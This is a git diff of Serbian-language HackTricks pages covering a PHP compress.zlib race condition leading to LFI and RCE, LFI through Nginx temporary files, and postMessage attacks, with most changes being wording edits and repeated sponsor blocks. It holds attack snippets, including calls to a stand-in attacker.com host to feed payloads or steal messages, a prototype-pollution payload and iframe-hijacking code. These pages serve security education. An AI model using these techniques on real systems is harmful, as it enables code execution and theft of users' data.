* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Podelite svoje hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -4,7 +4,7 @@
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJATELJSTVO**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
@ -12,15 +12,15 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač na **dark web-u** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za pretragu **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -34,7 +34,7 @@ To znači da poziv poput:
|
|||
```php
|
||||
file_get_contents("compress.zlib://http://attacker.com/file")
|
||||
```
|
||||
Zatražićemo zahtev za http://attacker.com/file, nakon čega server može odgovoriti zahtevom sa validnim HTTP odgovorom, zadržati otvorenu vezu i kasnije poslati dodatne podatke koji će takođe biti upisani u datoteku.
|
||||
Tako što će poslati zahtev tražeći http://attacker.com/file, server može odgovoriti zahtevom sa validnim HTTP odgovorom, zadržati otvorenu vezu i kasnije poslati dodatne podatke koji će takođe biti upisani u datoteku.
|
||||
|
||||
Možete videti tu informaciju u ovom delu koda php-src u main/streams/cast.c:
|
||||
```c
|
||||
|
@ -46,29 +46,29 @@ if (flags & PHP_STREAM_PREFER_STDIO) {
|
|||
*newstream = php_stream_temp_new();
|
||||
}
|
||||
```
|
||||
## Trkački uslov za RCE
|
||||
## Trkačka uslovnost ka RCE
|
||||
|
||||
[**Ovaj CTF**](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) je rešen korišćenjem prethodne prevare.
|
||||
|
||||
Napadač će naterati **žrtvin server da otvori vezu i čita fajl sa servera napadača** koristeći protokol **`compress.zlib`**.
|
||||
Napadač će naterati **žrtvin server da otvori vezu čitajući fajl sa servera napadača** koristeći protokol **`compress.zlib`**.
|
||||
|
||||
**Dok** ova **veza** postoji, napadač će **izvući putanju** do privremenog fajla koji je kreiran (koji je procureo od strane servera).
|
||||
**Dok** ova **veza** postoji, napadač će **eksfiltrirati putanju** do privremenog fajla koji je kreiran (server je otkrio tu informaciju).
|
||||
|
||||
**Dok** je **veza** još uvek otvorena, napadač će **iskoristiti LFI učitavanjem privremenog fajla** koji kontroliše.
|
||||
**Dok** je **veza** još uvek otvorena, napadač će **iskoristiti LFI učitavajući privremeni fajl** koji kontroliše.
|
||||
|
||||
Međutim, postoji provera u veb serveru koja **sprečava učitavanje fajlova koji sadrže `<?`**. Stoga, napadač će zloupotrebiti **Trkački uslov**. U vezi koja je još uvek otvorena, **napadač** će **poslati PHP payload NAKON** što je **veb server** proverio da li fajl sadrži zabranjene karaktere ali **PRE nego što učita njegov sadržaj**.
|
||||
Međutim, postoji provera u veb serveru koja **sprečava učitavanje fajlova koji sadrže `<?`**. Stoga, napadač će zloupotrebiti **Trkačku uslovnost**. U vezi koja je još uvek otvorena, **napadač** će **poslati PHP payload NAKON** što je **veb server** proverio da li fajl sadrži zabranjene karaktere ali **PRE nego što učita njegov sadržaj**.
|
||||
|
||||
Za više informacija pogledajte opis Trkačkog uslova i CTF na [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)
|
||||
Za više informacija pogledajte opis Trkačke uslovnosti i CTF na [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač na **dark vebu** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera koji kradu informacije**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač na **dark vebu** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera koji krade podatke**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomverom koji proizilaze iz malvera koji kradu informacije.
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji krade informacije.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za pretragu **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -78,9 +78,9 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
|
@ -14,13 +14,13 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač na **dark vebu** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade podatke**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji krade informacije.
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
|
@ -43,16 +43,16 @@ php_admin_value[session.upload_progress.enabled] = 0
|
|||
php_admin_value[file_uploads] = 0
|
||||
...
|
||||
```
|
||||
* Postavka / ojačavanje:
|
||||
* Postavka / učvršćivanje:
|
||||
```bash
|
||||
...
|
||||
chown -R 0:0 /tmp /var/tmp /var/lib/php/sessions
|
||||
chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
|
||||
...
|
||||
```
|
||||
Srećom, PHP se trenutno često implementira putem PHP-FPM-a i Nginxa. Nginx nudi lako previdljivu [client body buffering](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) funkciju koja će pisati privremene datoteke ako je telo klijenta (nije ograničeno na post) veće od određenog praga.
|
||||
Srećom, PHP se trenutno često implementira putem PHP-FPM-a i Nginxa. Nginx nudi lako previdljivu [funkciju za baferisanje tela klijenta](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) koja će pisati privremene datoteke ako je telo klijenta (ne ograničeno na post) veće od određenog praga.
|
||||
|
||||
Ova funkcija omogućava iskorišćavanje LFI-ja bez ikakvog drugog načina kreiranja datoteka, ako Nginx radi pod istim korisnikom kao PHP (vrlo često kao www-data).
|
||||
Ova funkcija omogućava iskorišćavanje LFI-ja bez ikakvog drugog načina kreiranja datoteka, ako Nginx radi kao isti korisnik kao PHP (vrlo često kao www-data).
|
||||
|
||||
Relevantan Nginx kod:
|
||||
```c
|
||||
|
@ -292,13 +292,13 @@ read_file_multiprocess(requests_session, nginx_pids)
|
|||
|
||||
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web**-om koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade podatke**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji krade informacije.
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
|
@ -310,7 +310,7 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
|
|
|
@ -16,21 +16,21 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web**-om koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač na **dark web-u** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb stranicu i isprobati njihovu mašinu **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Slanje **PostMessage**
|
||||
## Pošalji **PostMessage**
|
||||
|
||||
**PostMessage** koristi sledeću funkciju za slanje poruke:
|
||||
```bash
|
||||
|
@ -60,12 +60,12 @@ win[0].postMessage('{"__proto__":{"isAdmin":True}}', '*')
|
|||
```
|
||||
Imajte na umu da **targetOrigin** može biti '\*' ili URL poput _https://company.com._\
|
||||
U **drugom scenariju**, **poruka može biti poslata samo toj domeni** (čak i ako je poreklo objekta prozora drugačije).\
|
||||
Ako se koristi **zvezdica**, **poruke bi mogle biti poslate bilo kojoj domeni**, i biće poslate na poreklo objekta Prozora.
|
||||
Ako se koristi **zvezdica**, **poruke mogu biti poslate bilo kojoj domeni**, i biće poslate na poreklo objekta Prozora.
|
||||
|
||||
### Napad na iframe & zvezdicu u **targetOrigin**
|
||||
|
||||
Kao što je objašnjeno u [**ovom izveštaju**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) ako pronađete stranicu koja može biti **iframed** (bez zaštite `X-Frame-Header`) i koja šalje osetljivu poruku putem **postMessage** koristeći **zvezdicu** (\*), možete **modifikovati** **poreklo** **iframe-a** i **procureti** **osetljivu** poruku do domena koji kontrolišete.\
|
||||
Imajte na umu da ako stranica može biti iframed ali je **targetOrigin** postavljen na URL a ne na zvezdicu, ovaj **tri**k neće **raditi**.
|
||||
Kao što je objašnjeno u [**ovom izveštaju**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) ako pronađete stranicu koja može biti **iframed** (bez zaštite `X-Frame-Header`) i koja šalje osetljivu poruku putem **postMessage** koristeći **zvezdicu** (\*), možete **modifikovati** **poreklo** **iframe-a** i **procureti** **osetljivu** poruku na domen koji kontrolišete.\
|
||||
Imajte na umu da ako stranica može biti iframed ali je **targetOrigin** postavljen na URL a ne na zvezdicu, ovaj **tri**k neće raditi.
|
||||
```markup
|
||||
<html>
|
||||
<iframe src="https://docs.google.com/document/ID" />
|
||||
|
@ -80,7 +80,7 @@ window.frames[0].frame[0][2].location="https://attacker.com/exploit.html";
|
|||
}
|
||||
</script>
|
||||
```
|
||||
## Iskorišćavanje addEventListener
|
||||
## Iskorišćavanje `addEventListener`
|
||||
|
||||
**`addEventListener`** je funkcija koju JS koristi da deklariše funkciju koja očekuje `postMessages`.\
|
||||
Koristiće se kod sličan sledećem:
|
||||
|
@ -92,11 +92,11 @@ return;
|
|||
// ...
|
||||
}, false);
|
||||
```
|
||||
U ovom slučaju, **prva stvar** koju kod radi je **provera porekla**. To je izuzetno **važno**, posebno ako stranica planira da radi **nešto osetljivo** sa primljenim informacijama (kao što je promena lozinke). **Ako ne proverava poreklo, napadači mogu naterati žrtve da pošalju proizvoljne podatke na ove endpointove** i promene lozinke žrtava (u ovom primeru).
|
||||
U ovom slučaju, **prva stvar** koju kod radi je **provera porekla**. Ovo je izuzetno **važno**, posebno ako stranica namerava da radi **nešto osetljivo** sa primljenim informacijama (kao što je promena lozinke). **Ako ne proverava poreklo, napadači mogu naterati žrtve da pošalju proizvoljne podatke na ove endpointove** i promene lozinke žrtava (u ovom primeru).
|
||||
|
||||
### Enumeracija
|
||||
|
||||
Da biste **pronašli slušaoce događaja** na trenutnoj stranici možete:
|
||||
Da biste **pronašli slušaoce događaja** na trenutnoj stranici, možete:
|
||||
|
||||
* **Pretražite** JS kod za `window.addEventListener` i `$(window).on` (_JQuery verzija_)
|
||||
* **Izvršite** u konzoli alatki za razvoj: `getEventListeners(window)`
|
||||
|
@ -107,23 +107,23 @@ Da biste **pronašli slušaoce događaja** na trenutnoj stranici možete:
|
|||
|
||||
![](<../../.gitbook/assets/image (393).png>)
|
||||
|
||||
* Koristite **proširenje pregledača** poput [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta) ili [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker). Ova proširenja pregledača će **presresti sve poruke** i prikazati ih vama.
|
||||
* Koristite **dodatak za pregledač** poput [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta) ili [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker). Ovi dodaci za pregledače će **presresti sve poruke** i prikazati ih vama.
|
||||
|
||||
### Bypass provere porekla
|
||||
|
||||
* Atribut **`event.isTrusted`** smatra se sigurnim jer vraća `True` samo za događaje koji su generisani autentičnim korisničkim akcijama. Iako je izazovno zaobići ga ako je pravilno implementiran, njegova važnost u sigurnosnim proverama je značajna.
|
||||
* Korišćenje **`indexOf()`** za validaciju porekla u PostMessage događajima može biti podložno zaobilaženju. Primer koji ilustruje ovu ranjivost je:
|
||||
* Atribut **`event.isTrusted`** smatra se sigurnim jer vraća `True` samo za događaje koji su generisani autentičnim korisničkim akcijama. Iako je izazovno zaobići ga ako je pravilno implementiran, njegova važnost u sigurnosnim proverama je primetna.
|
||||
* Korišćenje **`indexOf()`** za proveru porekla u PostMessage događajima može biti podložno zaobilaženju. Primer koji ilustruje ovu ranjivost je:
|
||||
|
||||
```javascript
|
||||
("https://app-sj17.marketo.com").indexOf("https://app-sj17.ma")
|
||||
```
|
||||
* Metoda **`search()`** iz `String.prototype.search()` namenjena je regularnim izrazima, a ne stringovima. Prosleđivanje bilo čega osim regexpa dovodi do implicitne konverzije u regex, čineći metodu potencijalno nesigurnom. To je zato što u regexu tačka (.) deluje kao zamenski znak, omogućavajući zaobilaženje validacije sa specijalno oblikovanim domenima. Na primer:
|
||||
* Metoda **`search()`** iz `String.prototype.search()` namenjena je regularnim izrazima, a ne stringovima. Prosleđivanje bilo čega osim regexa dovodi do implicitne konverzije u regex, čineći metodu potencijalno nesigurnom. To je zato što u regexu tačka (.) deluje kao zamenski znak, omogućavajući zaobilaženje validacije sa specijalno oblikovanim domenima. Na primer:
|
||||
|
||||
```javascript
|
||||
"https://www.safedomain.com".search("www.s.fedomain.com")
|
||||
```
|
||||
* Funkcija **`match()`**, slično kao `search()`, obrađuje regex. Ako je regex nepravilno struktuiran, može biti podložan zaobilaženju.
|
||||
* Funkcija **`escapeHtml`** namenjena je zaštiti unosa putem izbegavanja karaktera. Međutim, ne stvara novi izbegnuti objekat već prepiše osobine postojećeg objekta. Ovo ponašanje može biti iskorišćeno. Posebno, ako se objekat može manipulisati tako da njegova kontrolisana osobina ne prepoznaje `hasOwnProperty`, `escapeHtml` neće raditi kako se očekuje. To je prikazano u primerima ispod:
|
||||
* Funkcija **`match()`**, slično kao `search()`, obrađuje regex. Ako regex nije pravilno struktuiran, može biti podložan zaobilaženju.
|
||||
* Funkcija **`escapeHtml`** namenjena je zaštiti unosa putem izbegavanja karaktera. Međutim, ne stvara novi izbegnuti objekat već prepiše osobine postojećeg objekta. Ovo ponašanje može biti iskorišćeno. Posebno, ako se objekat može manipulisati tako da njegova kontrolisana osobina ne prizna `hasOwnProperty`, `escapeHtml` neće raditi kako se očekuje. Ovo je prikazano u primerima ispod:
|
||||
|
||||
* Očekivano neuspešno:
|
||||
|
||||
|
@ -140,14 +140,14 @@ result = u(new Error("'\"<b>\\"));
|
|||
result.message; // "'"<b>\"
|
||||
```
|
||||
|
||||
U kontekstu ove ranjivosti, objekat `File` je posebno iskorišćiv zbog svoje samo za čitanje `name` osobine. Ova osobina, kada se koristi u šablonima, nije pročišćena funkcijom `escapeHtml`, što dovodi do potencijalnih sigurnosnih rizika.
|
||||
U kontekstu ove ranjivosti, objekat `File` je primetno iskorišćiv zbog svoje samo za čitanje `name` osobine. Ova osobina, kada se koristi u šablonima, nije pročišćena funkcijom `escapeHtml`, što dovodi do potencijalnih sigurnosnih rizika.
|
||||
* Svojstvo `document.domain` u JavaScript-u može biti postavljeno skriptom da skrati domen, omogućavajući opušteniju primenu politike istog porekla unutar istog roditeljskog domena.
|
||||
|
||||
### Bypass e.origin == window.origin
|
||||
|
||||
Prilikom ugrađivanja web stranice unutar **sandboxed iframe** koristeći %%%%%%, važno je razumeti da će poreklo ifream-a biti postavljeno na null. To je posebno važno kada se radi sa **sandbox atributima** i njihovim implikacijama na sigurnost i funkcionalnost.
|
||||
Prilikom ugrađivanja web stranice unutar **sandboxed iframe** koristeći %%%%%%, važno je razumeti da će poreklo ifream-a biti postavljeno na null. Ovo je posebno važno kada se radi sa **sandbox atributima** i njihovim implikacijama na sigurnost i funkcionalnost.
|
||||
|
||||
Specifikacijom **`allow-popups`** u sandbox atributu, svaki popup prozor otvoren iz ifream-a nasleđuje sandbox ograničenja svojih roditelja. To znači da osim ako se takođe ne uključi atribut **`allow-popups-to-escape-sandbox`**, poreklo popup prozora takođe je postavljeno na `null`, usklađujući se sa poreklom ifream-a.
|
||||
Specifikacijom **`allow-popups`** u sandbox atributu, svaki popup prozor otvoren iz ifream-a nasleđuje sandbox ograničenja svojih roditelja. To znači da osim ako se takođe uključi atribut **`allow-popups-to-escape-sandbox`**, poreklo popup prozora takođe je postavljeno na `null`, usklađujući se sa poreklom ifream-a.
|
||||
|
||||
Kao rezultat toga, kada se otvori popup u ovim uslovima i poruka se pošalje iz ifream-a ka popup prozoru koristeći **`postMessage`**, kako pošiljalac tako i primalac imaju svoja porekla postavljena na `null`. Ova situacija dovodi do scenarija gde **`e.origin == window.origin`** vrednuje kao tačno (`null == null`), jer i ifream i popup dele istu vrednost porekla `null`.
|
||||
|
||||
|
@ -174,10 +174,10 @@ Za više informacija **pročitajte:**
|
|||
[bypassing-sop-with-iframes-2.md](bypassing-sop-with-iframes-2.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Bypassovanje X-Frame-Header-a
|
||||
### X-Frame-Header zaobilaženje
|
||||
|
||||
Da biste izveli ove napade, idealno je da možete **ubaciti ciljnu web stranicu** unutar `iframe`-a. Međutim, neki zaglavlja poput `X-Frame-Header` mogu **sprečiti** takvo **ponašanje**.\
|
||||
U tim scenarijima i dalje možete koristiti manje prikraden napad. Možete otvoriti novi tab do ranjive web aplikacije i komunicirati s njom:
|
||||
Da biste izveli ove napade, idealno je da možete **ubaciti veb stranicu žrtve** unutar `iframe`-a. Međutim, neki zaglavlja poput `X-Frame-Header` mogu **sprečiti** takvo **ponašanje**.\
|
||||
U tim scenarijima i dalje možete koristiti manje prikraden napad. Možete otvoriti novi tab do ranjive veb aplikacije i komunicirati s njom:
|
||||
```markup
|
||||
<script>
|
||||
var w=window.open("<url>")
|
||||
|
@ -186,7 +186,7 @@ setTimeout(function(){w.postMessage('text here','*');}, 2000);
|
|||
```
|
||||
### Krađa poruke poslate detetu blokiranjem glavne stranice
|
||||
|
||||
Na sledećoj stranici možete videti kako biste mogli ukrasti **osetljive podatke poslate putem postmessage** detetu u **iframe-u** blokiranjem **glavne** stranice pre slanja podataka i zloupotrebe **XSS-a u detetu** da **procure podaci** pre nego što budu primljeni:
|
||||
Na sledećoj stranici možete videti kako biste mogli ukrasti **osetljive podatke poslate putem postmessage-a** detetu u **iframe-u** blokiranjem **glavne** stranice pre slanja podataka i zloupotrebom **XSS-a u detetu** da **procure podatke** pre nego što budu primljeni:
|
||||
|
||||
{% content-ref url="blocking-main-page-to-steal-postmessage.md" %}
|
||||
[blocking-main-page-to-steal-postmessage.md](blocking-main-page-to-steal-postmessage.md)
|
||||
|
@ -194,7 +194,7 @@ Na sledećoj stranici možete videti kako biste mogli ukrasti **osetljive podatk
|
|||
|
||||
### Krađa poruke modifikovanjem lokacije iframe-a
|
||||
|
||||
Ako možete ugraditi veb stranicu bez X-Frame-Header-a koja sadrži drugi iframe, možete **promeniti lokaciju tog detetovog iframe-a**, tako da ako prima **postmessage** poslat koristeći **zvezdicu**, napadač bi mogao **promeniti** tu iframe **poreklo** na stranicu kojom **kontroliše** i **ukrasti** poruku:
|
||||
Ako možete ugraditi veb stranicu bez X-Frame-Header-a koja sadrži drugi iframe, možete **promeniti lokaciju tog detetovog iframe-a**, tako da ako prima **postmessage** poslat korišćenjem **zvezdice**, napadač bi mogao **promeniti** tu iframe **poreklo** na stranicu kojom **kontroliše** i **ukrasti** poruku:
|
||||
|
||||
{% content-ref url="steal-postmessage-modifying-iframe-location.md" %}
|
||||
[steal-postmessage-modifying-iframe-location.md](steal-postmessage-modifying-iframe-location.md)
|
||||
|
@ -202,11 +202,11 @@ Ako možete ugraditi veb stranicu bez X-Frame-Header-a koja sadrži drugi iframe
|
|||
|
||||
### postMessage ka Prototype Pollution i/ili XSS
|
||||
|
||||
U scenarijima gde su podaci poslati putem `postMessage` izvršeni pomoću JS-a, možete **ugraditi** **stranicu** i **iskoristiti** **prototype pollution/XSS** slanjem eksploatacije putem `postMessage`.
|
||||
U scenarijima gde su podaci poslati putem `postMessage` izvršeni od strane JS-a, možete **ugraditi** **stranicu** i **iskoristiti** **prototype pollution/XSS** slanjem eksploatacije putem `postMessage`.
|
||||
|
||||
Par **veoma dobro objašnjenih XSS-a putem `postMessage`** može se pronaći na [https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html)
|
||||
|
||||
Primer eksploatacije za zloupotrebu **Prototype Pollution a zatim XSS-a** putem `postMessage` ka `iframe-u`:
|
||||
Primer eksploatacije za zloupotrebu **Prototype Pollution a zatim XSS-a** putem `postMessage` ka `iframe`-u:
|
||||
```html
|
||||
<html>
|
||||
<body>
|
||||
|
@ -234,15 +234,15 @@ Za **više informacija**:
|
|||
